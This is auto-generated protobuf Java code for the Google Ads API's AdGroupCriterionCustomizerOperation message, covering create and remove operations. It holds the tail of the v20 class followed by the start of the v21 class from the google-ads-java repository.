result.operationCase_ = operationCase_; result.operation_ = this.operation_; if (operationCase_ == 1 && createBuilder_ != null) { result.operation_ = createBuilder_.build(); } } @java.lang.Override public Builder clone() { return super.clone(); } @java.lang.Override public Builder setField( com.google.protobuf.Descriptors.FieldDescriptor field, java.lang.Object value) { return super.setField(field, value); } @java.lang.Override public Builder clearField( com.google.protobuf.Descriptors.FieldDescriptor field) { return super.clearField(field); } @java.lang.Override public Builder clearOneof( com.google.protobuf.Descriptors.OneofDescriptor oneof) { return super.clearOneof(oneof); } @java.lang.Override public Builder setRepeatedField( com.google.protobuf.Descriptors.FieldDescriptor field, int index, java.lang.Object value) { return super.setRepeatedField(field, index, value); } @java.lang.Override public Builder addRepeatedField( com.google.protobuf.Descriptors.FieldDescriptor field, java.lang.Object value) { return super.addRepeatedField(field, value); } @java.lang.Override public Builder mergeFrom(com.google.protobuf.Message other) { if (other instanceof com.google.ads.googleads.v20.services.AdGroupCriterionCustomizerOperation) { return mergeFrom((com.google.ads.googleads.v20.services.AdGroupCriterionCustomizerOperation)other); } else { super.mergeFrom(other); return this; } } public Builder mergeFrom(com.google.ads.googleads.v20.services.AdGroupCriterionCustomizerOperation other) { if (other == com.google.ads.googleads.v20.services.AdGroupCriterionCustomizerOperation.getDefaultInstance()) return this; switch (other.getOperationCase()) { case CREATE: { mergeCreate(other.getCreate()); break; } case REMOVE: { operationCase_ = 2; operation_ = other.operation_; onChanged(); break; } case OPERATION_NOT_SET: { break; } } this.mergeUnknownFields(other.getUnknownFields()); onChanged(); return this; } @java.lang.Override public final boolean isInitialized() { return true; } 
@java.lang.Override public Builder mergeFrom( com.google.protobuf.CodedInputStream input, com.google.protobuf.ExtensionRegistryLite extensionRegistry) throws java.io.IOException { if (extensionRegistry == null) { throw new java.lang.NullPointerException(); } try { boolean done = false; while (!done) { int tag = input.readTag(); switch (tag) { case 0: done = true; break; case 10: { input.readMessage( getCreateFieldBuilder().getBuilder(), extensionRegistry); operationCase_ = 1; break; } // case 10 case 18: { java.lang.String s = input.readStringRequireUtf8(); operationCase_ = 2; operation_ = s; break; } // case 18 default: { if (!super.parseUnknownField(input, extensionRegistry, tag)) { done = true; // was an endgroup tag } break; } // default: } // switch (tag) } // while (!done) } catch (com.google.protobuf.InvalidProtocolBufferException e) { throw e.unwrapIOException(); } finally { onChanged(); } // finally return this; } private int operationCase_ = 0; private java.lang.Object operation_; public OperationCase getOperationCase() { return OperationCase.forNumber( operationCase_); } public Builder clearOperation() { operationCase_ = 0; operation_ = null; onChanged(); return this; } private int bitField0_; private com.google.protobuf.SingleFieldBuilderV3< com.google.ads.googleads.v20.resources.AdGroupCriterionCustomizer, com.google.ads.googleads.v20.resources.AdGroupCriterionCustomizer.Builder, com.google.ads.googleads.v20.resources.AdGroupCriterionCustomizerOrBuilder> createBuilder_; /** * <pre> * Create operation: No resource name is expected for the new ad group * criterion customizer. * </pre> * * <code>.google.ads.googleads.v20.resources.AdGroupCriterionCustomizer create = 1;</code> * @return Whether the create field is set. */ @java.lang.Override public boolean hasCreate() { return operationCase_ == 1; } /** * <pre> * Create operation: No resource name is expected for the new ad group * criterion customizer. 
* </pre> * * <code>.google.ads.googleads.v20.resources.AdGroupCriterionCustomizer create = 1;</code> * @return The create. */ @java.lang.Override public com.google.ads.googleads.v20.resources.AdGroupCriterionCustomizer getCreate() { if (createBuilder_ == null) { if (operationCase_ == 1) { return (com.google.ads.googleads.v20.resources.AdGroupCriterionCustomizer) operation_; } return com.google.ads.googleads.v20.resources.AdGroupCriterionCustomizer.getDefaultInstance(); } else { if (operationCase_ == 1) { return createBuilder_.getMessage(); } return com.google.ads.googleads.v20.resources.AdGroupCriterionCustomizer.getDefaultInstance(); } } /** * <pre> * Create operation: No resource name is expected for the new ad group * criterion customizer. * </pre> * * <code>.google.ads.googleads.v20.resources.AdGroupCriterionCustomizer create = 1;</code> */ public Builder setCreate(com.google.ads.googleads.v20.resources.AdGroupCriterionCustomizer value) { if (createBuilder_ == null) { if (value == null) { throw new NullPointerException(); } operation_ = value; onChanged(); } else { createBuilder_.setMessage(value); } operationCase_ = 1; return this; } /** * <pre> * Create operation: No resource name is expected for the new ad group * criterion customizer. * </pre> * * <code>.google.ads.googleads.v20.resources.AdGroupCriterionCustomizer create = 1;</code> */ public Builder setCreate( com.google.ads.googleads.v20.resources.AdGroupCriterionCustomizer.Builder builderForValue) { if (createBuilder_ == null) { operation_ = builderForValue.build(); onChanged(); } else { createBuilder_.setMessage(builderForValue.build()); } operationCase_ = 1; return this; } /** * <pre> * Create operation: No resource name is expected for the new ad group * criterion customizer. 
* </pre> * * <code>.google.ads.googleads.v20.resources.AdGroupCriterionCustomizer create = 1;</code> */ public Builder mergeCreate(com.google.ads.googleads.v20.resources.AdGroupCriterionCustomizer value) { if (createBuilder_ == null) { if (operationCase_ == 1 && operation_ != com.google.ads.googleads.v20.resources.AdGroupCriterionCustomizer.getDefaultInstance()) { operation_ = com.google.ads.googleads.v20.resources.AdGroupCriterionCustomizer.newBuilder((com.google.ads.googleads.v20.resources.AdGroupCriterionCustomizer) operation_) .mergeFrom(value).buildPartial(); } else { operation_ = value; } onChanged(); } else { if (operationCase_ == 1) { createBuilder_.mergeFrom(value); } else { createBuilder_.setMessage(value); } } operationCase_ = 1; return this; } /** * <pre> * Create operation: No resource name is expected for the new ad group * criterion customizer. * </pre> * * <code>.google.ads.googleads.v20.resources.AdGroupCriterionCustomizer create = 1;</code> */ public Builder clearCreate() { if (createBuilder_ == null) { if (operationCase_ == 1) { operationCase_ = 0; operation_ = null; onChanged(); } } else { if (operationCase_ == 1) { operationCase_ = 0; operation_ = null; } createBuilder_.clear(); } return this; } /** * <pre> * Create operation: No resource name is expected for the new ad group * criterion customizer. * </pre> * * <code>.google.ads.googleads.v20.resources.AdGroupCriterionCustomizer create = 1;</code> */ public com.google.ads.googleads.v20.resources.AdGroupCriterionCustomizer.Builder getCreateBuilder() { return getCreateFieldBuilder().getBuilder(); } /** * <pre> * Create operation: No resource name is expected for the new ad group * criterion customizer. 
* </pre> * * <code>.google.ads.googleads.v20.resources.AdGroupCriterionCustomizer create = 1;</code> */ @java.lang.Override public com.google.ads.googleads.v20.resources.AdGroupCriterionCustomizerOrBuilder getCreateOrBuilder() { if ((operationCase_ == 1) && (createBuilder_ != null)) { return createBuilder_.getMessageOrBuilder(); } else { if (operationCase_ == 1) { return (com.google.ads.googleads.v20.resources.AdGroupCriterionCustomizer) operation_; } return com.google.ads.googleads.v20.resources.AdGroupCriterionCustomizer.getDefaultInstance(); } } /** * <pre> * Create operation: No resource name is expected for the new ad group * criterion customizer. * </pre> * * <code>.google.ads.googleads.v20.resources.AdGroupCriterionCustomizer create = 1;</code> */ private com.google.protobuf.SingleFieldBuilderV3< com.google.ads.googleads.v20.resources.AdGroupCriterionCustomizer, com.google.ads.googleads.v20.resources.AdGroupCriterionCustomizer.Builder, com.google.ads.googleads.v20.resources.AdGroupCriterionCustomizerOrBuilder> getCreateFieldBuilder() { if (createBuilder_ == null) { if (!(operationCase_ == 1)) { operation_ = com.google.ads.googleads.v20.resources.AdGroupCriterionCustomizer.getDefaultInstance(); } createBuilder_ = new com.google.protobuf.SingleFieldBuilderV3< com.google.ads.googleads.v20.resources.AdGroupCriterionCustomizer, com.google.ads.googleads.v20.resources.AdGroupCriterionCustomizer.Builder, com.google.ads.googleads.v20.resources.AdGroupCriterionCustomizerOrBuilder>( (com.google.ads.googleads.v20.resources.AdGroupCriterionCustomizer) operation_, getParentForChildren(), isClean()); operation_ = null; } operationCase_ = 1; onChanged(); return createBuilder_; } /** * <pre> * Remove operation: A resource name for the removed ad group criterion * customizer is expected, in this format: * * `customers/{customer_id}/adGroupCriterionCustomizers/{ad_group_id}~{criterion_id}~{customizer_attribute_id}` * </pre> * * <code>string remove = 2 
[(.google.api.resource_reference) = { ... }</code> * @return Whether the remove field is set. */ @java.lang.Override public boolean hasRemove() { return operationCase_ == 2; } /** * <pre> * Remove operation: A resource name for the removed ad group criterion * customizer is expected, in this format: * * `customers/{customer_id}/adGroupCriterionCustomizers/{ad_group_id}~{criterion_id}~{customizer_attribute_id}` * </pre> * * <code>string remove = 2 [(.google.api.resource_reference) = { ... }</code> * @return The remove. */ @java.lang.Override public java.lang.String getRemove() { java.lang.Object ref = ""; if (operationCase_ == 2) { ref = operation_; } if (!(ref instanceof java.lang.String)) { com.google.protobuf.ByteString bs = (com.google.protobuf.ByteString) ref; java.lang.String s = bs.toStringUtf8(); if (operationCase_ == 2) { operation_ = s; } return s; } else { return (java.lang.String) ref; } } /** * <pre> * Remove operation: A resource name for the removed ad group criterion * customizer is expected, in this format: * * `customers/{customer_id}/adGroupCriterionCustomizers/{ad_group_id}~{criterion_id}~{customizer_attribute_id}` * </pre> * * <code>string remove = 2 [(.google.api.resource_reference) = { ... }</code> * @return The bytes for remove. */ @java.lang.Override public com.google.protobuf.ByteString getRemoveBytes() { java.lang.Object ref = ""; if (operationCase_ == 2) { ref = operation_; } if (ref instanceof String) { com.google.protobuf.ByteString b = com.google.protobuf.ByteString.copyFromUtf8( (java.lang.String) ref); if (operationCase_ == 2) { operation_ = b; } return b; } else { return (com.google.protobuf.ByteString) ref; } } /** * <pre> * Remove operation: A resource name for the removed ad group criterion * customizer is expected, in this format: * * `customers/{customer_id}/adGroupCriterionCustomizers/{ad_group_id}~{criterion_id}~{customizer_attribute_id}` * </pre> * * <code>string remove = 2 [(.google.api.resource_reference) = { ... 
}</code> * @param value The remove to set. * @return This builder for chaining. */ public Builder setRemove( java.lang.String value) { if (value == null) { throw new NullPointerException(); } operationCase_ = 2; operation_ = value; onChanged(); return this; } /** * <pre> * Remove operation: A resource name for the removed ad group criterion * customizer is expected, in this format: * * `customers/{customer_id}/adGroupCriterionCustomizers/{ad_group_id}~{criterion_id}~{customizer_attribute_id}` * </pre> * * <code>string remove = 2 [(.google.api.resource_reference) = { ... }</code> * @return This builder for chaining. */ public Builder clearRemove() { if (operationCase_ == 2) { operationCase_ = 0; operation_ = null; onChanged(); } return this; } /** * <pre> * Remove operation: A resource name for the removed ad group criterion * customizer is expected, in this format: * * `customers/{customer_id}/adGroupCriterionCustomizers/{ad_group_id}~{criterion_id}~{customizer_attribute_id}` * </pre> * * <code>string remove = 2 [(.google.api.resource_reference) = { ... }</code> * @param value The bytes for remove to set. * @return This builder for chaining. 
*/ public Builder setRemoveBytes( com.google.protobuf.ByteString value) { if (value == null) { throw new NullPointerException(); } checkByteStringIsUtf8(value); operationCase_ = 2; operation_ = value; onChanged(); return this; } @java.lang.Override public final Builder setUnknownFields( final com.google.protobuf.UnknownFieldSet unknownFields) { return super.setUnknownFields(unknownFields); } @java.lang.Override public final Builder mergeUnknownFields( final com.google.protobuf.UnknownFieldSet unknownFields) { return super.mergeUnknownFields(unknownFields); } // @@protoc_insertion_point(builder_scope:google.ads.googleads.v20.services.AdGroupCriterionCustomizerOperation) } // @@protoc_insertion_point(class_scope:google.ads.googleads.v20.services.AdGroupCriterionCustomizerOperation) private static final com.google.ads.googleads.v20.services.AdGroupCriterionCustomizerOperation DEFAULT_INSTANCE; static { DEFAULT_INSTANCE = new com.google.ads.googleads.v20.services.AdGroupCriterionCustomizerOperation(); } public static com.google.ads.googleads.v20.services.AdGroupCriterionCustomizerOperation getDefaultInstance() { return DEFAULT_INSTANCE; } private static final com.google.protobuf.Parser<AdGroupCriterionCustomizerOperation> PARSER = new com.google.protobuf.AbstractParser<AdGroupCriterionCustomizerOperation>() { @java.lang.Override public AdGroupCriterionCustomizerOperation parsePartialFrom( com.google.protobuf.CodedInputStream input, com.google.protobuf.ExtensionRegistryLite extensionRegistry) throws com.google.protobuf.InvalidProtocolBufferException { Builder builder = newBuilder(); try { builder.mergeFrom(input, extensionRegistry); } catch (com.google.protobuf.InvalidProtocolBufferException e) { throw e.setUnfinishedMessage(builder.buildPartial()); } catch (com.google.protobuf.UninitializedMessageException e) { throw e.asInvalidProtocolBufferException().setUnfinishedMessage(builder.buildPartial()); } catch (java.io.IOException e) { throw new 
com.google.protobuf.InvalidProtocolBufferException(e) .setUnfinishedMessage(builder.buildPartial()); } return builder.buildPartial(); } }; public static com.google.protobuf.Parser<AdGroupCriterionCustomizerOperation> parser() { return PARSER; } @java.lang.Override public com.google.protobuf.Parser<AdGroupCriterionCustomizerOperation> getParserForType() { return PARSER; } @java.lang.Override public com.google.ads.googleads.v20.services.AdGroupCriterionCustomizerOperation getDefaultInstanceForType() { return DEFAULT_INSTANCE; } }
googleads/google-ads-java
35,915
google-ads-stubs-v21/src/main/java/com/google/ads/googleads/v21/services/AdGroupCriterionCustomizerOperation.java
// Generated by the protocol buffer compiler. DO NOT EDIT! // source: google/ads/googleads/v21/services/ad_group_criterion_customizer_service.proto // Protobuf Java Version: 3.25.7 package com.google.ads.googleads.v21.services; /** * <pre> * A single operation (create, remove) on a customizer attribute. * </pre> * * Protobuf type {@code google.ads.googleads.v21.services.AdGroupCriterionCustomizerOperation} */ public final class AdGroupCriterionCustomizerOperation extends com.google.protobuf.GeneratedMessageV3 implements // @@protoc_insertion_point(message_implements:google.ads.googleads.v21.services.AdGroupCriterionCustomizerOperation) AdGroupCriterionCustomizerOperationOrBuilder { private static final long serialVersionUID = 0L; // Use AdGroupCriterionCustomizerOperation.newBuilder() to construct. private AdGroupCriterionCustomizerOperation(com.google.protobuf.GeneratedMessageV3.Builder<?> builder) { super(builder); } private AdGroupCriterionCustomizerOperation() { } @java.lang.Override @SuppressWarnings({"unused"}) protected java.lang.Object newInstance( UnusedPrivateParameter unused) { return new AdGroupCriterionCustomizerOperation(); } public static final com.google.protobuf.Descriptors.Descriptor getDescriptor() { return com.google.ads.googleads.v21.services.AdGroupCriterionCustomizerServiceProto.internal_static_google_ads_googleads_v21_services_AdGroupCriterionCustomizerOperation_descriptor; } @java.lang.Override protected com.google.protobuf.GeneratedMessageV3.FieldAccessorTable internalGetFieldAccessorTable() { return com.google.ads.googleads.v21.services.AdGroupCriterionCustomizerServiceProto.internal_static_google_ads_googleads_v21_services_AdGroupCriterionCustomizerOperation_fieldAccessorTable .ensureFieldAccessorsInitialized( com.google.ads.googleads.v21.services.AdGroupCriterionCustomizerOperation.class, com.google.ads.googleads.v21.services.AdGroupCriterionCustomizerOperation.Builder.class); } private int operationCase_ = 0; 
@SuppressWarnings("serial") private java.lang.Object operation_; public enum OperationCase implements com.google.protobuf.Internal.EnumLite, com.google.protobuf.AbstractMessage.InternalOneOfEnum { CREATE(1), REMOVE(2), OPERATION_NOT_SET(0); private final int value; private OperationCase(int value) { this.value = value; } /** * @param value The number of the enum to look for. * @return The enum associated with the given number. * @deprecated Use {@link #forNumber(int)} instead. */ @java.lang.Deprecated public static OperationCase valueOf(int value) { return forNumber(value); } public static OperationCase forNumber(int value) { switch (value) { case 1: return CREATE; case 2: return REMOVE; case 0: return OPERATION_NOT_SET; default: return null; } } public int getNumber() { return this.value; } }; public OperationCase getOperationCase() { return OperationCase.forNumber( operationCase_); } public static final int CREATE_FIELD_NUMBER = 1; /** * <pre> * Create operation: No resource name is expected for the new ad group * criterion customizer. * </pre> * * <code>.google.ads.googleads.v21.resources.AdGroupCriterionCustomizer create = 1;</code> * @return Whether the create field is set. */ @java.lang.Override public boolean hasCreate() { return operationCase_ == 1; } /** * <pre> * Create operation: No resource name is expected for the new ad group * criterion customizer. * </pre> * * <code>.google.ads.googleads.v21.resources.AdGroupCriterionCustomizer create = 1;</code> * @return The create. */ @java.lang.Override public com.google.ads.googleads.v21.resources.AdGroupCriterionCustomizer getCreate() { if (operationCase_ == 1) { return (com.google.ads.googleads.v21.resources.AdGroupCriterionCustomizer) operation_; } return com.google.ads.googleads.v21.resources.AdGroupCriterionCustomizer.getDefaultInstance(); } /** * <pre> * Create operation: No resource name is expected for the new ad group * criterion customizer. 
* </pre> * * <code>.google.ads.googleads.v21.resources.AdGroupCriterionCustomizer create = 1;</code> */ @java.lang.Override public com.google.ads.googleads.v21.resources.AdGroupCriterionCustomizerOrBuilder getCreateOrBuilder() { if (operationCase_ == 1) { return (com.google.ads.googleads.v21.resources.AdGroupCriterionCustomizer) operation_; } return com.google.ads.googleads.v21.resources.AdGroupCriterionCustomizer.getDefaultInstance(); } public static final int REMOVE_FIELD_NUMBER = 2; /** * <pre> * Remove operation: A resource name for the removed ad group criterion * customizer is expected, in this format: * * `customers/{customer_id}/adGroupCriterionCustomizers/{ad_group_id}~{criterion_id}~{customizer_attribute_id}` * </pre> * * <code>string remove = 2 [(.google.api.resource_reference) = { ... }</code> * @return Whether the remove field is set. */ public boolean hasRemove() { return operationCase_ == 2; } /** * <pre> * Remove operation: A resource name for the removed ad group criterion * customizer is expected, in this format: * * `customers/{customer_id}/adGroupCriterionCustomizers/{ad_group_id}~{criterion_id}~{customizer_attribute_id}` * </pre> * * <code>string remove = 2 [(.google.api.resource_reference) = { ... }</code> * @return The remove. */ public java.lang.String getRemove() { java.lang.Object ref = ""; if (operationCase_ == 2) { ref = operation_; } if (ref instanceof java.lang.String) { return (java.lang.String) ref; } else { com.google.protobuf.ByteString bs = (com.google.protobuf.ByteString) ref; java.lang.String s = bs.toStringUtf8(); if (operationCase_ == 2) { operation_ = s; } return s; } } /** * <pre> * Remove operation: A resource name for the removed ad group criterion * customizer is expected, in this format: * * `customers/{customer_id}/adGroupCriterionCustomizers/{ad_group_id}~{criterion_id}~{customizer_attribute_id}` * </pre> * * <code>string remove = 2 [(.google.api.resource_reference) = { ... }</code> * @return The bytes for remove. 
*/ public com.google.protobuf.ByteString getRemoveBytes() { java.lang.Object ref = ""; if (operationCase_ == 2) { ref = operation_; } if (ref instanceof java.lang.String) { com.google.protobuf.ByteString b = com.google.protobuf.ByteString.copyFromUtf8( (java.lang.String) ref); if (operationCase_ == 2) { operation_ = b; } return b; } else { return (com.google.protobuf.ByteString) ref; } } private byte memoizedIsInitialized = -1; @java.lang.Override public final boolean isInitialized() { byte isInitialized = memoizedIsInitialized; if (isInitialized == 1) return true; if (isInitialized == 0) return false; memoizedIsInitialized = 1; return true; } @java.lang.Override public void writeTo(com.google.protobuf.CodedOutputStream output) throws java.io.IOException { if (operationCase_ == 1) { output.writeMessage(1, (com.google.ads.googleads.v21.resources.AdGroupCriterionCustomizer) operation_); } if (operationCase_ == 2) { com.google.protobuf.GeneratedMessageV3.writeString(output, 2, operation_); } getUnknownFields().writeTo(output); } @java.lang.Override public int getSerializedSize() { int size = memoizedSize; if (size != -1) return size; size = 0; if (operationCase_ == 1) { size += com.google.protobuf.CodedOutputStream .computeMessageSize(1, (com.google.ads.googleads.v21.resources.AdGroupCriterionCustomizer) operation_); } if (operationCase_ == 2) { size += com.google.protobuf.GeneratedMessageV3.computeStringSize(2, operation_); } size += getUnknownFields().getSerializedSize(); memoizedSize = size; return size; } @java.lang.Override public boolean equals(final java.lang.Object obj) { if (obj == this) { return true; } if (!(obj instanceof com.google.ads.googleads.v21.services.AdGroupCriterionCustomizerOperation)) { return super.equals(obj); } com.google.ads.googleads.v21.services.AdGroupCriterionCustomizerOperation other = (com.google.ads.googleads.v21.services.AdGroupCriterionCustomizerOperation) obj; if (!getOperationCase().equals(other.getOperationCase())) return false; 
switch (operationCase_) { case 1: if (!getCreate() .equals(other.getCreate())) return false; break; case 2: if (!getRemove() .equals(other.getRemove())) return false; break; case 0: default: } if (!getUnknownFields().equals(other.getUnknownFields())) return false; return true; } @java.lang.Override public int hashCode() { if (memoizedHashCode != 0) { return memoizedHashCode; } int hash = 41; hash = (19 * hash) + getDescriptor().hashCode(); switch (operationCase_) { case 1: hash = (37 * hash) + CREATE_FIELD_NUMBER; hash = (53 * hash) + getCreate().hashCode(); break; case 2: hash = (37 * hash) + REMOVE_FIELD_NUMBER; hash = (53 * hash) + getRemove().hashCode(); break; case 0: default: } hash = (29 * hash) + getUnknownFields().hashCode(); memoizedHashCode = hash; return hash; } public static com.google.ads.googleads.v21.services.AdGroupCriterionCustomizerOperation parseFrom( java.nio.ByteBuffer data) throws com.google.protobuf.InvalidProtocolBufferException { return PARSER.parseFrom(data); } public static com.google.ads.googleads.v21.services.AdGroupCriterionCustomizerOperation parseFrom( java.nio.ByteBuffer data, com.google.protobuf.ExtensionRegistryLite extensionRegistry) throws com.google.protobuf.InvalidProtocolBufferException { return PARSER.parseFrom(data, extensionRegistry); } public static com.google.ads.googleads.v21.services.AdGroupCriterionCustomizerOperation parseFrom( com.google.protobuf.ByteString data) throws com.google.protobuf.InvalidProtocolBufferException { return PARSER.parseFrom(data); } public static com.google.ads.googleads.v21.services.AdGroupCriterionCustomizerOperation parseFrom( com.google.protobuf.ByteString data, com.google.protobuf.ExtensionRegistryLite extensionRegistry) throws com.google.protobuf.InvalidProtocolBufferException { return PARSER.parseFrom(data, extensionRegistry); } public static com.google.ads.googleads.v21.services.AdGroupCriterionCustomizerOperation parseFrom(byte[] data) throws 
com.google.protobuf.InvalidProtocolBufferException { return PARSER.parseFrom(data); } public static com.google.ads.googleads.v21.services.AdGroupCriterionCustomizerOperation parseFrom( byte[] data, com.google.protobuf.ExtensionRegistryLite extensionRegistry) throws com.google.protobuf.InvalidProtocolBufferException { return PARSER.parseFrom(data, extensionRegistry); } public static com.google.ads.googleads.v21.services.AdGroupCriterionCustomizerOperation parseFrom(java.io.InputStream input) throws java.io.IOException { return com.google.protobuf.GeneratedMessageV3 .parseWithIOException(PARSER, input); } public static com.google.ads.googleads.v21.services.AdGroupCriterionCustomizerOperation parseFrom( java.io.InputStream input, com.google.protobuf.ExtensionRegistryLite extensionRegistry) throws java.io.IOException { return com.google.protobuf.GeneratedMessageV3 .parseWithIOException(PARSER, input, extensionRegistry); } public static com.google.ads.googleads.v21.services.AdGroupCriterionCustomizerOperation parseDelimitedFrom(java.io.InputStream input) throws java.io.IOException { return com.google.protobuf.GeneratedMessageV3 .parseDelimitedWithIOException(PARSER, input); } public static com.google.ads.googleads.v21.services.AdGroupCriterionCustomizerOperation parseDelimitedFrom( java.io.InputStream input, com.google.protobuf.ExtensionRegistryLite extensionRegistry) throws java.io.IOException { return com.google.protobuf.GeneratedMessageV3 .parseDelimitedWithIOException(PARSER, input, extensionRegistry); } public static com.google.ads.googleads.v21.services.AdGroupCriterionCustomizerOperation parseFrom( com.google.protobuf.CodedInputStream input) throws java.io.IOException { return com.google.protobuf.GeneratedMessageV3 .parseWithIOException(PARSER, input); } public static com.google.ads.googleads.v21.services.AdGroupCriterionCustomizerOperation parseFrom( com.google.protobuf.CodedInputStream input, com.google.protobuf.ExtensionRegistryLite extensionRegistry) throws 
java.io.IOException { return com.google.protobuf.GeneratedMessageV3 .parseWithIOException(PARSER, input, extensionRegistry); } @java.lang.Override public Builder newBuilderForType() { return newBuilder(); } public static Builder newBuilder() { return DEFAULT_INSTANCE.toBuilder(); } public static Builder newBuilder(com.google.ads.googleads.v21.services.AdGroupCriterionCustomizerOperation prototype) { return DEFAULT_INSTANCE.toBuilder().mergeFrom(prototype); } @java.lang.Override public Builder toBuilder() { return this == DEFAULT_INSTANCE ? new Builder() : new Builder().mergeFrom(this); } @java.lang.Override protected Builder newBuilderForType( com.google.protobuf.GeneratedMessageV3.BuilderParent parent) { Builder builder = new Builder(parent); return builder; } /** * <pre> * A single operation (create, remove) on a customizer attribute. * </pre> * * Protobuf type {@code google.ads.googleads.v21.services.AdGroupCriterionCustomizerOperation} */ public static final class Builder extends com.google.protobuf.GeneratedMessageV3.Builder<Builder> implements // @@protoc_insertion_point(builder_implements:google.ads.googleads.v21.services.AdGroupCriterionCustomizerOperation) com.google.ads.googleads.v21.services.AdGroupCriterionCustomizerOperationOrBuilder { public static final com.google.protobuf.Descriptors.Descriptor getDescriptor() { return com.google.ads.googleads.v21.services.AdGroupCriterionCustomizerServiceProto.internal_static_google_ads_googleads_v21_services_AdGroupCriterionCustomizerOperation_descriptor; } @java.lang.Override protected com.google.protobuf.GeneratedMessageV3.FieldAccessorTable internalGetFieldAccessorTable() { return com.google.ads.googleads.v21.services.AdGroupCriterionCustomizerServiceProto.internal_static_google_ads_googleads_v21_services_AdGroupCriterionCustomizerOperation_fieldAccessorTable .ensureFieldAccessorsInitialized( com.google.ads.googleads.v21.services.AdGroupCriterionCustomizerOperation.class, 
com.google.ads.googleads.v21.services.AdGroupCriterionCustomizerOperation.Builder.class); } // Construct using com.google.ads.googleads.v21.services.AdGroupCriterionCustomizerOperation.newBuilder() private Builder() { } private Builder( com.google.protobuf.GeneratedMessageV3.BuilderParent parent) { super(parent); } @java.lang.Override public Builder clear() { super.clear(); bitField0_ = 0; if (createBuilder_ != null) { createBuilder_.clear(); } operationCase_ = 0; operation_ = null; return this; } @java.lang.Override public com.google.protobuf.Descriptors.Descriptor getDescriptorForType() { return com.google.ads.googleads.v21.services.AdGroupCriterionCustomizerServiceProto.internal_static_google_ads_googleads_v21_services_AdGroupCriterionCustomizerOperation_descriptor; } @java.lang.Override public com.google.ads.googleads.v21.services.AdGroupCriterionCustomizerOperation getDefaultInstanceForType() { return com.google.ads.googleads.v21.services.AdGroupCriterionCustomizerOperation.getDefaultInstance(); } @java.lang.Override public com.google.ads.googleads.v21.services.AdGroupCriterionCustomizerOperation build() { com.google.ads.googleads.v21.services.AdGroupCriterionCustomizerOperation result = buildPartial(); if (!result.isInitialized()) { throw newUninitializedMessageException(result); } return result; } @java.lang.Override public com.google.ads.googleads.v21.services.AdGroupCriterionCustomizerOperation buildPartial() { com.google.ads.googleads.v21.services.AdGroupCriterionCustomizerOperation result = new com.google.ads.googleads.v21.services.AdGroupCriterionCustomizerOperation(this); if (bitField0_ != 0) { buildPartial0(result); } buildPartialOneofs(result); onBuilt(); return result; } private void buildPartial0(com.google.ads.googleads.v21.services.AdGroupCriterionCustomizerOperation result) { int from_bitField0_ = bitField0_; } private void buildPartialOneofs(com.google.ads.googleads.v21.services.AdGroupCriterionCustomizerOperation result) { 
result.operationCase_ = operationCase_; result.operation_ = this.operation_; if (operationCase_ == 1 && createBuilder_ != null) { result.operation_ = createBuilder_.build(); } } @java.lang.Override public Builder clone() { return super.clone(); } @java.lang.Override public Builder setField( com.google.protobuf.Descriptors.FieldDescriptor field, java.lang.Object value) { return super.setField(field, value); } @java.lang.Override public Builder clearField( com.google.protobuf.Descriptors.FieldDescriptor field) { return super.clearField(field); } @java.lang.Override public Builder clearOneof( com.google.protobuf.Descriptors.OneofDescriptor oneof) { return super.clearOneof(oneof); } @java.lang.Override public Builder setRepeatedField( com.google.protobuf.Descriptors.FieldDescriptor field, int index, java.lang.Object value) { return super.setRepeatedField(field, index, value); } @java.lang.Override public Builder addRepeatedField( com.google.protobuf.Descriptors.FieldDescriptor field, java.lang.Object value) { return super.addRepeatedField(field, value); } @java.lang.Override public Builder mergeFrom(com.google.protobuf.Message other) { if (other instanceof com.google.ads.googleads.v21.services.AdGroupCriterionCustomizerOperation) { return mergeFrom((com.google.ads.googleads.v21.services.AdGroupCriterionCustomizerOperation)other); } else { super.mergeFrom(other); return this; } } public Builder mergeFrom(com.google.ads.googleads.v21.services.AdGroupCriterionCustomizerOperation other) { if (other == com.google.ads.googleads.v21.services.AdGroupCriterionCustomizerOperation.getDefaultInstance()) return this; switch (other.getOperationCase()) { case CREATE: { mergeCreate(other.getCreate()); break; } case REMOVE: { operationCase_ = 2; operation_ = other.operation_; onChanged(); break; } case OPERATION_NOT_SET: { break; } } this.mergeUnknownFields(other.getUnknownFields()); onChanged(); return this; } @java.lang.Override public final boolean isInitialized() { return true; } 
@java.lang.Override public Builder mergeFrom( com.google.protobuf.CodedInputStream input, com.google.protobuf.ExtensionRegistryLite extensionRegistry) throws java.io.IOException { if (extensionRegistry == null) { throw new java.lang.NullPointerException(); } try { boolean done = false; while (!done) { int tag = input.readTag(); switch (tag) { case 0: done = true; break; case 10: { input.readMessage( getCreateFieldBuilder().getBuilder(), extensionRegistry); operationCase_ = 1; break; } // case 10 case 18: { java.lang.String s = input.readStringRequireUtf8(); operationCase_ = 2; operation_ = s; break; } // case 18 default: { if (!super.parseUnknownField(input, extensionRegistry, tag)) { done = true; // was an endgroup tag } break; } // default: } // switch (tag) } // while (!done) } catch (com.google.protobuf.InvalidProtocolBufferException e) { throw e.unwrapIOException(); } finally { onChanged(); } // finally return this; } private int operationCase_ = 0; private java.lang.Object operation_; public OperationCase getOperationCase() { return OperationCase.forNumber( operationCase_); } public Builder clearOperation() { operationCase_ = 0; operation_ = null; onChanged(); return this; } private int bitField0_; private com.google.protobuf.SingleFieldBuilderV3< com.google.ads.googleads.v21.resources.AdGroupCriterionCustomizer, com.google.ads.googleads.v21.resources.AdGroupCriterionCustomizer.Builder, com.google.ads.googleads.v21.resources.AdGroupCriterionCustomizerOrBuilder> createBuilder_; /** * <pre> * Create operation: No resource name is expected for the new ad group * criterion customizer. * </pre> * * <code>.google.ads.googleads.v21.resources.AdGroupCriterionCustomizer create = 1;</code> * @return Whether the create field is set. */ @java.lang.Override public boolean hasCreate() { return operationCase_ == 1; } /** * <pre> * Create operation: No resource name is expected for the new ad group * criterion customizer. 
